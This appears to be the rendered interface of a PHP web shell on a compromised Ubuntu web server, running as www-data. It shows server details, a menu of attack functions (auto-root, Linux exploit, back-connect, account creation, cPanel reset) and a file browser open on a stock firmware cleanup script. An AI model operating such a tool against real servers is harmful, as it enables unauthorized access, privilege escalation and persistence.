Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.72
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core /
17212 /
usr /
lib /
fwupdate /
[ HOME SHELL ]
Name
Size
Permission
Action
cleanup
665
B
-rwxr-xr-x
fwupx64.efi
64.08
KB
-rw-r--r--
fwupx64.efi.signed
65.95
KB
-rw-r--r--
install
1.28
KB
-rwxr-xr-x
version
13
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cleanup
#!/bin/sh set -e if [ -e "/var/cache/fwupdate/done" ]; then exit 0 fi efibootmgr -q BOOTNUM=$(efibootmgr | grep "Linux.Firmware.Updater" | sed "s/\ .*//; s/*//; s/Boot//") if [ -n "$BOOTNUM" ]; then for num in $BOOTNUM; do efibootmgr -q -b $num -B done fi for x in /boot/efi/EFI/ubuntu/fw/fwupdate-* ; do if [ "${x}" != "/boot/efi/EFI/ubuntu/fw/fwupdate-*" ]; then rm -f "${x}" fi done for x in /sys/firmware/efi/efivars/fwupdate-*-0abba7dc-e516-4167-bbf5-4d9d1c739416 ; do if [ "${x}" != "/sys/firmware/efi/efivars/fwupdate-*-0abba7dc-e516-4167-bbf5-4d9d1c739416" ]; then chattr -i "${x}" rm -f "${x}" fi done touch "/var/cache//fwupdate/done"
Close